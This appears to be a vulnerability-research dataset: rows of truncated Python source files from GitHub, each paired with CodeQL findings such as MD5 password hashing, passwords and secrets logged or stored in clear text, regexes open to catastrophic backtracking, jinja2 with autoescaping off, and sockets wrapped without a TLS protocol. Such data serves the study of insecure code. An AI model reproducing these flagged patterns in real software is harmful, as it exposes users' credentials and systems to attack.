added stringlengths 32 32 | created int64 1,236B 1,694B | id stringlengths 40 40 | int_score int64 2 5 | metadata dict | score float64 2.31 5.03 | source stringclasses 1
value | text stringlengths 330 19.3k | num_lines int64 16 648 | avg_line_length float64 15.5 59.3 | max_line_length int64 37 179 | ast_depth int64 8 38 | length int64 102 3.79k | lang stringclasses 1
value | sast_codeql_findings stringlengths 1.11k 276k | sast_codeql_findings_count int64 1 33 | sast_codeql_success bool 1
class | sast_codeql_error stringclasses 1
value | cwe_ids listlengths 1 33 | rule_ids listlengths 1 33 | confidences listlengths 1 33 | severities listlengths 1 33 | messages listlengths 1 33 | line_starts listlengths 1 33 | line_ends listlengths 1 33 | column_starts listlengths 1 33 | column_ends listlengths 1 33 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2024-11-18T19:28:54.697419+00:00 | 1,454,023,374,000 | 9ff1e1660dafed64312192989c7fb6028740a20b | 3 | {
"blob_id": "9ff1e1660dafed64312192989c7fb6028740a20b",
"branch_name": "refs/heads/master",
"committer_date": 1454023374000,
"content_id": "0d4e1730c6c8ef9c39296959fb9baf61debbf6f6",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "7a69318d4b2720c2f61b6c9d1c23309671d1ac76",
"extension": "p... | 3.015625 | stackv2 | # Copyright (c) 2015, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and t... | 120 | 35.12 | 77 | 16 | 1,070 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_0420023d52f1076d_23b83779", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensi... | [
63
] | [
null
] | [
28
] | [
48
] | |
2024-11-18T19:28:55.733195+00:00 | 1,604,729,457,000 | 09f2d8999df163a139010837ab4bf41644ed1caa | 2 | {
"blob_id": "09f2d8999df163a139010837ab4bf41644ed1caa",
"branch_name": "refs/heads/main",
"committer_date": 1604729457000,
"content_id": "6725a611cc4261855555aa27284075a274a91a7a",
"detected_licenses": [
"MIT"
],
"directory_id": "5c92c902c3a2d893fc1e674cb5539efbfdb7b888",
"extension": "py",
"file... | 2.390625 | stackv2 | #! /usr/bin/env python3
import pathlib
import os
import json
import sys
import getopt
from time import sleep
from votecheck import michigan
def print_help():
print('Look up Michigan voters')
print('zombie_votes.py --mi')
print('zombie_votes.py --michigan')
print('')
def hunt_mi_zombies():
for f... | 117 | 45.03 | 119 | 35 | 838 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a6621460a4bee85e_1fea2361", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text."
] | [
51
] | [
60
] | [
41
] | [
74
] | |
2024-11-18T19:39:57.494393+00:00 | 1,493,255,357,000 | 1f13c006846aa4cea27b29c63f71a7c7df8d31f9 | 3 | {
"blob_id": "1f13c006846aa4cea27b29c63f71a7c7df8d31f9",
"branch_name": "refs/heads/master",
"committer_date": 1493255357000,
"content_id": "96be0ecca23e80fdb8c4c9e9161e45ee65a6d71f",
"detected_licenses": [
"MIT"
],
"directory_id": "c971407d6d5b2071f6ba156445fb271951d39648",
"extension": "py",
"fi... | 2.65625 | stackv2 | from concurrent import futures
import io
import json
import logging
import socket
import sys
import threading
class UnixDomainSocketRpc(object):
def __init__(self, socket_path, executor=None):
self.socket_path = socket_path
self.decoder = json.JSONDecoder()
self.executor = executor
de... | 215 | 31.91 | 92 | 17 | 1,654 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_2cb1009df60a9d8d_acf43000", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
48
] | [
null
] | [
63
] | [
67
] | |
2024-11-18T20:18:02.399649+00:00 | 1,550,615,489,000 | a415acc93b816b33fe4133ae8c86fb98a2917815 | 3 | {
"blob_id": "a415acc93b816b33fe4133ae8c86fb98a2917815",
"branch_name": "refs/heads/master",
"committer_date": 1550615489000,
"content_id": "c7b0714ab8290b6b9169b3d99c3fa6f9ca1283ca",
"detected_licenses": [
"MIT"
],
"directory_id": "7186d66f2a2457170ef6396190e50dadae840a2c",
"extension": "py",
"fi... | 3.3125 | stackv2 | from datetime import datetime as dt
def receive_basic_iuput_data(Singal_Loss, Shock_Alert, Oxygen_Supply, Fever, Hypotension, Hypertension):
##Recevie data from input module, then analyze it using some judge functions to generate boolean result
##Boolean Parameters
##If paramter returns True, means it sho... | 59 | 39.69 | 107 | 10 | 609 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_bcc8ee2b464896c3_c69a75ea", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 3 | true | [
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text."
] | [
37,
44,
46
] | [
null,
null,
null
] | [
27,
27,
22
] | [
37,
36,
28
] | |
2024-11-18T20:18:11.066262+00:00 | 1,537,250,556,000 | 5a2403ac8b9dc4d1587faa74aaa6c1ed639f2919 | 2 | {
"blob_id": "5a2403ac8b9dc4d1587faa74aaa6c1ed639f2919",
"branch_name": "refs/heads/master",
"committer_date": 1537250556000,
"content_id": "9fd0bebf1357b68c52569a0b03d11684f0dfdc72",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "2240b83758ff6d56190ee374092b453234a627d7",
"extension": "py"... | 2.4375 | stackv2 | import urllib.request
import json
import datetime
import os
import argparse
import time
import sys
import jinja2
import shutil
hash_log_path = "HA - Observed Instances.hlog"
feed_log_dir = "."
def get_HA_feed():
url = "https://www.hybrid-analysis.com/feed?json"
dt_now = datetime.datetime.now().strftime('%b %... | 184 | 38.67 | 138 | 27 | 1,571 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_6cc5c01bd0862324_abfcdc1b", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
168
] | [
null
] | [
35
] | [
76
] | |
2024-11-18T20:18:19.318083+00:00 | 1,623,134,697,000 | 762ccd2b10722369fced614ec976e34d7366e282 | 3 | {
"blob_id": "762ccd2b10722369fced614ec976e34d7366e282",
"branch_name": "refs/heads/main",
"committer_date": 1623134697000,
"content_id": "66c40663fed11a681c120dc83c602826cd583bb8",
"detected_licenses": [
"MIT"
],
"directory_id": "fce6839410208718a411e88ce057ee29637cc9ac",
"extension": "py",
"file... | 2.53125 | stackv2 | import json
import os
import re
import sys
# from itertools import chain
from tuw_nlp.text.pipeline import CachedStanzaPipeline, CustomStanzaPipeline
from tuw_nlp.text.utils import normalize_whitespace
from tqdm import tqdm
SEC_NUM_PATT = re.compile(
r'^(?P<secnum>(?:II*\.|[1-9][0-9]?(\.[1-9][0-9]?)*[.\s]+)+)(?P... | 121 | 29.69 | 91 | 20 | 900 | python | [{"finding_id": "codeql_py/redos_63a23482edfe9068_7c6883a7", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with '1' and containing many repetition... | 1 | true | [
"CWE-1333"
] | [
"py/redos"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings starting with '1' and containing many repetitions of '.1'."
] | [
13
] | [
null
] | [
39
] | [
55
] | |
2024-11-18T20:18:35.627609+00:00 | 1,495,796,706,000 | 567b9e565480e8e400b5d6a5c7498107ea754634 | 3 | {
"blob_id": "567b9e565480e8e400b5d6a5c7498107ea754634",
"branch_name": "refs/heads/master",
"committer_date": 1495796706000,
"content_id": "70dfaed70c9109b80b920a187f9ea8d434378d8c",
"detected_licenses": [
"MIT"
],
"directory_id": "accf9b1734d60c4b57e16244c1f8fccba73d8747",
"extension": "py",
"fi... | 3.3125 | stackv2 | import re
from .mappings import lat2cir, bi2mono
def clean(text):
""" Clean text and convert everything to uppercase. """
text = text.upper()
return re.sub(r'[~`!@#$%^&*()-=_+\{\}\[\]\\:\;\"\'\|\?\>\<\,\.\/QWXY]+', " ", text)
def convert2cir(text):
""" Convert Latin script to Cyrilic."""
for i, j ... | 23 | 33.13 | 103 | 15 | 210 | python | [{"finding_id": "codeql_py/overly-large-range_fa4c5cd569d0b2c4_d557c533", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[)*+,\\-.\\/0-9:;<=\\].", "remediation": "", "locatio... | 1 | true | [
"CWE-020"
] | [
"py/overly-large-range"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[)*+,\\-.\\/0-9:;<=\\]."
] | [
7
] | [
null
] | [
33
] | [
36
] | |
2024-11-18T20:18:45.390446+00:00 | 1,502,467,714,000 | 5efca822e587f6167eb381030163ea8dd7230a5e | 3 | {
"blob_id": "5efca822e587f6167eb381030163ea8dd7230a5e",
"branch_name": "refs/heads/master",
"committer_date": 1502467714000,
"content_id": "53d8085075e5fa55ffa40f44c8b7a6d01a7e560c",
"detected_licenses": [
"MIT"
],
"directory_id": "7bbe50a18dac0ee26eb3896bc958f5e5dcd5f029",
"extension": "py",
"fi... | 2.953125 | stackv2 | #####################################
# improve_person_dataset_cat
# Input: prop_selection.txt
# person_data.tsv
# cat_assignment.json
# actor-professions.txt
# politician-professions.txt
# scientist-professions.txt
# sport-professions.txt
# writer-professions.txt
# category_blacklist.txt
# countries... | 256 | 30.19 | 130 | 21 | 2,118 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_5267864123ba9cba_2d3de1f1", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (private)](1) as clear text.\n... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data",
"py/clear-text-storage-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression stores [sensitive data (private)](1) as clear text.\nThis expression stores [sensitive data (private)](2) as clear text.\nThis expression stores [sensitive data (private)](3) as clear text.\nThis expression stores [sensitive data (private)](1) as clear text.\nThis expression stores [sensitive data ... | [
233,
237
] | [
null,
null
] | [
17,
17
] | [
28,
42
] | |
2024-11-18T20:18:46.295666+00:00 | 1,460,475,364,000 | 83dbc9322674d243a314deaa94e7308acb7c3ae5 | 3 | {
"blob_id": "83dbc9322674d243a314deaa94e7308acb7c3ae5",
"branch_name": "refs/heads/master",
"committer_date": 1460475364000,
"content_id": "6731a273076d9ee0cffda34ade846e7e9d1b7620",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "5952de4a17b61c7543eda4129ea43e5f920ec22e",
"extension": "py"... | 2.515625 | stackv2 | from uuid import getnode as get_mac
import ssl
import json
import socket
import time
class ServerConnection(object):
"""
This class manages the connection to the door server. It automatically
attempts to reconnect to the server every 10 seconds if the connection
fails.
"""
# Connect to 192.16... | 102 | 31.7 | 94 | 18 | 701 | python | [{"finding_id": "codeql_py/insecure-default-protocol_1a2bd4bcf09e5898_c97c95d6", "tool_name": "codeql", "rule_id": "py/insecure-default-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in... | 1 | true | [
"CWE-327"
] | [
"py/insecure-default-protocol"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in an insecure default being used."
] | [
29
] | [
35
] | [
29
] | [
45
] | |
2024-11-18T20:29:34.281348+00:00 | 1,621,263,364,000 | 0db717a12ad7f2b6e6c7f8b12a956cae37a9342f | 3 | {
"blob_id": "0db717a12ad7f2b6e6c7f8b12a956cae37a9342f",
"branch_name": "refs/heads/main",
"committer_date": 1621263364000,
"content_id": "8e7099024181bdd01cef107f154ef9088b6d3f22",
"detected_licenses": [
"CC0-1.0"
],
"directory_id": "30111ec37c11b5a770349f8bba996fa99358de35",
"extension": "py",
"... | 2.796875 | stackv2 | # Imports
import numpy as np
import re
import string
import progressbar
import logging
logger = logging.getLogger(__name__)
# Import spacy
import spacy
import it_core_news_sm
nlp_it = it_core_news_sm.load()
############
# STOPWORDS
############
# Import list of stopwords from it_stop_words.py
from it_stop_words imp... | 113 | 28.16 | 123 | 14 | 856 | python | [{"finding_id": "codeql_py/overly-large-range_a9b151f8fae20ffd_78627ef0", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.", "remediatio... | 4 | true | [
"CWE-020",
"CWE-020",
"CWE-020",
"CWE-020"
] | [
"py/overly-large-range",
"py/overly-large-range",
"py/overly-large-range",
"py/overly-large-range"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.",
"Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.",
"Suspicious character range that overlaps with \\ufffd-\\ufffd in the same character class.",
"Suspicious character range ... | [
47,
47,
47,
47
] | [
null,
null,
null,
null
] | [
30,
33,
36,
45
] | [
34,
37,
40,
49
] | |
2024-11-18T19:07:00.026427+00:00 | 1,689,347,157,000 | d3b7671fdbcb4c470d654e5b6ba9c0c0666a5035 | 3 | {
"blob_id": "d3b7671fdbcb4c470d654e5b6ba9c0c0666a5035",
"branch_name": "refs/heads/master",
"committer_date": 1689347157000,
"content_id": "0ed4c01a4cfec4b9d692613265dab3556fe55a90",
"detected_licenses": [
"MIT"
],
"directory_id": "a752341e85c7ea1edbb362f69cf5c9e2aa71585f",
"extension": "py",
"fi... | 2.546875 | stackv2 | import datetime
import json
import logging
import os
import tempfile
from pathlib import Path
import morph_kgc
from rdflib import Graph
from ..utils import constants
class DataGraph:
def __init__(self):
self.g = Graph()
def somef_data_to_graph(self, somef_data):
"""
Method that retu... | 187 | 50.5 | 134 | 29 | 1,786 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_b1fd6fb7d4162ca4_77656245", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [api.github.com](1) may be at an arbitrary position in ... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The string [api.github.com](1) may be at an arbitrary position in the sanitized URL."
] | [
89
] | [
90
] | [
83
] | [
75
] | |
2024-11-18T19:07:19.493277+00:00 | 1,631,606,053,000 | 3f003ee566e617defd80a100ee6b44a49d3c4974 | 3 | {
"blob_id": "3f003ee566e617defd80a100ee6b44a49d3c4974",
"branch_name": "refs/heads/main",
"committer_date": 1631606053000,
"content_id": "8e52549883fd0be379413f410dd38555ec9f1371",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "f6ed7bc808f5536bc77166fe5c3571e5c028f308",
"extension": "py",
... | 2.546875 | stackv2 | #
# Copyright (c) 2016, deepsense.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in w... | 144 | 29.99 | 100 | 18 | 1,050 | python | [{"finding_id": "codeql_py/redos_7899250afeaaf3ab_a569b563", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitio... | 2 | true | [
"CWE-1333",
"CWE-1333"
] | [
"py/redos",
"py/redos"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitions of '\\\\\\\\'.",
"This part of the regular expression may cause exponential backtracking on strings starting with '\"' and containing many repetitions of '\\\\\\\\'."
] | [
39,
42
] | [
null,
null
] | [
28,
28
] | [
48,
45
] | |
2024-11-18T19:07:23.270624+00:00 | 1,611,808,229,000 | 4a577e33d832e1173b37d99934bd416cd621573e | 4 | {
"blob_id": "4a577e33d832e1173b37d99934bd416cd621573e",
"branch_name": "refs/heads/main",
"committer_date": 1611808229000,
"content_id": "7cda9d1a0ade103aa0b78cad9b4b1b25cdbef4e6",
"detected_licenses": [
"MIT"
],
"directory_id": "67a60a7bce36691ab5f2280a27cd70d57a1cdb69",
"extension": "py",
"file... | 4.28125 | stackv2 | # Some dictionary methods
# copy() Returns a copy of the dictionary
# fromkeys() Returns a dictionary with the specified keys and value
# popitem() Removes the last inserted key-value pair (pop() removes a random item)
# setdefault() Returns the value of the specified key.
# If the key is not foun... | 43 | 31.77 | 109 | 8 | 390 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_f9745f27d6466f93_147f7dc3", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 6 | true | [
"CWE-312",
"CWE-312",
"CWE-312",
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.",
"This expression logs [sensitive dat... | [
11,
16,
30,
32,
37,
43
] | [
null,
null,
null,
null,
null,
null
] | [
7,
7,
7,
7,
7,
7
] | [
24,
25,
24,
24,
24,
24
] | |
2024-11-18T19:07:26.191084+00:00 | 1,571,233,225,000 | cec9cc94352cc75fc6cd99ff0cc0e0149bb6bca6 | 3 | {
"blob_id": "cec9cc94352cc75fc6cd99ff0cc0e0149bb6bca6",
"branch_name": "refs/heads/master",
"committer_date": 1571233225000,
"content_id": "25bfc1d24c72c1a397585c9e659869212a85aa71",
"detected_licenses": [
"MIT"
],
"directory_id": "41e7fe067bc1689b9673a25c11420a3aa3f56f19",
"extension": "py",
"fi... | 2.75 | stackv2 | import datetime
import requests
from flask import Flask, render_template
from flask_caching import Cache
from htmlmin.minify import html_minify
app = Flask(__name__)
cache = Cache(config={'CACHE_TYPE': 'simple'})
cache.init_app(app)
@app.route('/')
@app.route('/index')
@cache.cached(timeout=300) # 1800 seconds ==... | 67 | 27.37 | 163 | 15 | 451 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_894c4a528a2094cb_efa7cf8f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text."
] | [
43
] | [
null
] | [
11
] | [
20
] | |
2024-11-18T19:07:38.716246+00:00 | 1,635,632,510,000 | 0cd897dafe28ead6561c243c0cd58a7dc6afebb9 | 3 | {
"blob_id": "0cd897dafe28ead6561c243c0cd58a7dc6afebb9",
"branch_name": "refs/heads/master",
"committer_date": 1635632510000,
"content_id": "bf3280f57daead8f34aaa290ac89cc08113f05e4",
"detected_licenses": [
"MIT"
],
"directory_id": "37eb4737e9aed842a2f5aa6e5c4143cdff5018af",
"extension": "py",
"fi... | 2.6875 | stackv2 | import bisect
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from zoneinfo import ZoneInfo
import matplotlib.pyplot as plt
from matplotlib.axes import Axes
from matplotlib.lines import Line2D
from skyfield.constants import DEG2RAD
from base.classical import ZODIAC
from base.data impo... | 190 | 31.93 | 99 | 18 | 1,484 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a5efaa028a2f0282_a59f9baa", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text."
] | [
101
] | [
null
] | [
15
] | [
34
] | |
2024-11-18T19:07:58.127458+00:00 | 1,588,524,975,000 | 5cb195003954519e3034d490f4ab5db3d2108e80 | 3 | {
"blob_id": "5cb195003954519e3034d490f4ab5db3d2108e80",
"branch_name": "refs/heads/master",
"committer_date": 1588524975000,
"content_id": "4de75a2d43799f09a7f9078a6013d7414f7736e7",
"detected_licenses": [
"MIT"
],
"directory_id": "57387969b4a3f2da22e6aa0513e18f47e41d74fe",
"extension": "py",
"fi... | 3.4375 | stackv2 | #!/usr/bin/env python3
import argparse
import random
parser = argparse.ArgumentParser()
parser.add_argument("language", help="language of the names")
parser.add_argument("--sex", "-s", choices=['female', 'male'], help="sex of names")
parser.add_argument("--count", "-c", type=int, default=100, help="number of names to ... | 27 | 29.96 | 93 | 11 | 207 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_a3c60079c92f2cbb_3cc3eb36", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text."
] | [
12
] | [
null
] | [
7
] | [
68
] | |
2024-11-18T19:08:00.007550+00:00 | 1,607,510,793,000 | b583d46e64532a32b12bb9fd03911ea4a175ab25 | 3 | {
"blob_id": "b583d46e64532a32b12bb9fd03911ea4a175ab25",
"branch_name": "refs/heads/main",
"committer_date": 1607510793000,
"content_id": "25687cd2856d67fa3506a3dd0ec7f79764ec5a48",
"detected_licenses": [
"MIT"
],
"directory_id": "9c4e7f15ff127683d50674212ce06a8ded6b6724",
"extension": "py",
"file... | 3.40625 | stackv2 | import re
charMatch = re.compile('[a-z]|[A-Z]')
validPasswords = 0
invalidPasswords = 0
with open("passwords.txt") as f:
for line in f:
minimum = 0
maximum = 0
numString = ''
charactermatch = ''
password = ''
isPassword = False
for char in line:
... | 57 | 30.12 | 99 | 15 | 391 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_d6ca52aaf533fe34_96b4edef", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text."
] | [
57
] | [
null
] | [
7
] | [
21
] | |
2024-11-18T19:18:20.460846+00:00 | 1,602,450,062,000 | 216db57b529aab17dee9042d73982d16757e48ab | 3 | {
"blob_id": "216db57b529aab17dee9042d73982d16757e48ab",
"branch_name": "refs/heads/master",
"committer_date": 1602450062000,
"content_id": "070cff24c2671ccda5316dcc9058074663bdce4e",
"detected_licenses": [
"MIT"
],
"directory_id": "8f577b79b837ab67b29fe0528e5dcd7b238ce019",
"extension": "py",
"fi... | 2.8125 | stackv2 | """This module provides objects for managing docker mount instances."""
from contextlib import contextmanager
from tempfile import _TemporaryFileWrapper as TemporaryFile
from tempfile import NamedTemporaryFile
from typing import Any, Dict, Optional
from docker.models.volumes import Volume as DockerVolume
from docker.... | 119 | 32.56 | 99 | 13 | 833 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_a49464f04ae7b9a2_f1e5ee69", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
66
] | [
null
] | [
15
] | [
99
] | |
2024-11-18T19:18:26.860401+00:00 | 1,493,710,838,000 | e3dc284c23024460e563078f66315a5041a55102 | 3 | {
"blob_id": "e3dc284c23024460e563078f66315a5041a55102",
"branch_name": "refs/heads/master",
"committer_date": 1493710838000,
"content_id": "96c6c60086843298768eef7ae72196fecd3e8b98",
"detected_licenses": [
"MIT"
],
"directory_id": "f2fea666ffe0b29735e2b76cd6c7ddc458db3e29",
"extension": "py",
"fi... | 2.65625 | stackv2 | # -*- coding: utf-8-*-
import os
import re
from getpass import getpass
import yaml
import shellapath
def main():
p_shella = open(shellapath.config("profile.yml"), "a")
print("*******************************************************")
print("* SHELLA - MODULES CONFIGURATION TOOL *")
... | 102 | 34.25 | 96 | 38 | 983 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_6baa7dc51772d018_aca3d6e7", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text.\... | 3 | true | [
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data",
"py/clear-text-storage-sensitive-data",
"py/clear-text-storage-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text.\nThis expression stores [sensitive data (password)](2) as clear text.\nThis expression stores [sensitive data (password)](3) as clear text.",
"This expression stores [sensitive data (secret)](1) as clear text.\nThis expression stores [sensitive... | [
38,
59,
89
] | [
41,
61,
94
] | [
18,
18,
18
] | [
57,
53,
65
] | |
2024-11-18T19:18:57.244543+00:00 | 1,519,066,323,000 | 6f5a29730b24d0f1cc8fafcc79ebed217ef2360a | 3 | {
"blob_id": "6f5a29730b24d0f1cc8fafcc79ebed217ef2360a",
"branch_name": "refs/heads/master",
"committer_date": 1519066323000,
"content_id": "3606b8a08ece249a2b071c7b4a7c3b237e297d69",
"detected_licenses": [
"MIT"
],
"directory_id": "782626a4fecb7888b582ecbae8b84e28bf48e8a7",
"extension": "py",
"fi... | 2.859375 | stackv2 | from flask import Flask, jsonify, request
from flask import abort
import pbkdf2helper
from pycra import create_challenge, auth_check
app = Flask(__name__)
# Simple Flask App with Challenge-Response Authentication (PBKDF2 hashed Passwords stored)
class User(object):
"""
My Test User Model
"""
def _... | 116 | 22.75 | 105 | 13 | 672 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_ceef90fb7a93b17f_7b11323d", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
115
] | [
null
] | [
11
] | [
66
] | |
